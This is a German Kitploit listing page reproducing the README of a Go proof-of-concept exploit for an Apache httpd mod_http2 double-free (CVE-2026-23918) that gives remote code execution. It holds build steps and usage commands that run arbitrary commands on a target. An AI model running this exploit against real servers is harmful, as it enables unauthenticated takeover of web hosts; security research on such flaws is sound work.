Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23918-Double-free-Apache-httpd-mod_http2 — Go-basierter Proof-of-Concept-Exploit für CVE-2026-23918, der eine Double-Free-Sicherheitslücke in Apache httpd mod_http2 ausnutzt, was eine Remote-Codeausführung ohne Authentifizierung mittels Memory-Spray- und Trigger-Sequenzen ermöglicht. | Kitploit
Tools/GitHubGitHub/gagaltotal/cve-2026-23918-double-free-apache-httpd-mod_http2
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubgagaltotal/cve-2026-23918-double-free-apache-httpd-mod_http2

CVE-2026-23918-Double-free-Apache-httpd-mod_http2

Go-basierter Proof-of-Concept-Exploit für CVE-2026-23918, der eine Double-Free-Sicherheitslücke in Apache httpd mod_http2 ausnutzt, was eine Remote-Codeausführung ohne Authentifizierung mittels Memory-Spray- und Trigger-Sequenzen ermöglicht.

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-23918 - Apache httpd mod_http2 PoC

Dieses Repository enthält eine Proof-of-Concept-Implementierung in Go für ein Pre-Authentication-Memory-Corruption-Szenario, das Apache httpd mit mod_http2 betrifft. Der Code in diesem Repository zeigt einen Spray-and-Trigger-Ansatz gegen ein anfälliges Ziel und ist für autorisierte Sicherheitsforschung, Tests und defensive Analyse bestimmt.

Überblick

Das Projekt konzentriert sich auf einen Proof-of-Concept-Exploit für CVE-2026-23918 und bietet eine Single-File-Implementierung in exploit_poc.go. Das Programm:

  • Erstellt eine manipulierte HTTP-Request-Payload
  • Führt Memory-Spray-Aktivitäten gegen einen Zieldienst durch
  • Sendet eine HTTP/2-Trigger-Sequenz
  • Versucht, einen bereitgestellten Befehl über den anfälligen Ausführungspfad auszuführen

Dieses Repository ist nicht für die unbefugte Nutzung gegen Drittsysteme bestimmt.

Projektstruktur

  • exploit_poc.go - Hauptimplementierung des PoC in Go
  • go.mod - Go-Moduldefinition
  • exploit - Projektbezogene Artefakte oder Hilfsressourcen
  • images - Screenshots oder unterstützende Bilder

Voraussetzungen

Stellen Sie vor dem Bauen oder Ausführen des PoC sicher, dass Folgendes verfügbar ist:

  • Go 1.26.4 oder eine kompatible neuere Version
  • Root-Rechte, wenn die automatische Speicheradress-Extraktion über /proc//mem verwendet wird
  • Netzwerkzugriff auf die Ziel-Apache-httpd-Instanz
  • Eine Testumgebung, die Sie bewerten dürfen

Build und Init-Installation

Erstellen Sie das Binary mit dem folgenden Befehl:

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-23918-Double-free-Apache-httpd-mod_http2
cd CVE-2026-23918-Double-free-Apache-httpd-mod_http2
go mod init CVE-2026-23918-Double-free-Apache-httpd-mod_http2
go mod tidy
go run exploit_poc.go
go build -o exploit exploit_poc.go

Dies erzeugt eine ausführbare Datei namens exploit im Projektstammverzeichnis.

Verwendung

Screen Capture

Screen Capture

Der PoC unterstützt zwei Betriebsmodi:

1. Automatischer Modus mit PID-basierter Adressextraktion

Dieser Modus erfordert Root-Zugriff und extrahiert automatisch die erforderlichen Speicheradressen aus dem Ziel-Apache-Worker-Prozess.

root@kitploit:~
sudo ./exploit \
  --pid 1234 \
  --host 192.168.1.100 \
  --port 443 \
  --cmd "id > /tmp/pwned"

2. Manueller Modus mit expliziten Adressen

Dieser Modus erfordert, dass die Adressen der system-Funktion und des Scoreboard-Request-Slots manuell angegeben werden.

root@kitploit:~
./exploit \
  --host 192.168.1.100 \
  --port 443 \
  --system 0x7f1234567890 \
  --scoreboard 0x7f1234000000 \
  --cmd "id > /tmp/pwned"

Befehlszeilenoptionen

Die wichtigsten Optionen sind:

  • --host - Zielhostname oder IP-Adresse
  • --port - Zielport (Standard: 443)
  • --workers - Anzahl der Spray-Worker-Threads (Standard: 32)
  • --cmd - Auf dem Ziel auszuführender Befehl
  • --pid - Apache-Worker-Prozess-ID für automatische Speicheradress-Extraktion
  • --system - Adresse des system-Symbols im manuellen Modus
  • --scoreboard - Adresse des Scoreboard-Request-Slots im manuellen Modus

Beispielbefehle

Automatisch extrahieren und Befehl ausführen

root@kitploit:~
sudo ./exploit --pid 1234 --host 10.0.0.20 --cmd "whoami"

Manueller Modus mit expliziten Adressen

root@kitploit:~
./exploit \
  --host 10.0.0.20 \
  --system 0x7f1234567890 \
  --scoreboard 0x7f1234000000 \
  --cmd "uname -a"

Hinweise

  • Der Exploit kann den Zieldienst zum Absturz bringen oder destabilisieren.
  • Verwenden Sie ihn nur gegen Systeme, die Ihnen gehören oder für deren Tests Sie ausdrücklich autorisiert sind.
  • Das Programm behandelt SIGINT und SIGTERM, um die Spray-Schleife ordnungsgemäß zu beenden.

Verantwortungsvolle Nutzung

Dieses Repository wird zu Bildungszwecken und zur defensiven Sicherheitsbewertung bereitgestellt. Eine Nutzung außerhalb einer kontrollierten und autorisierten Umgebung wird nicht empfohlen und kann gegen geltende Gesetze oder Richtlinien verstoßen.

Tool herunterladen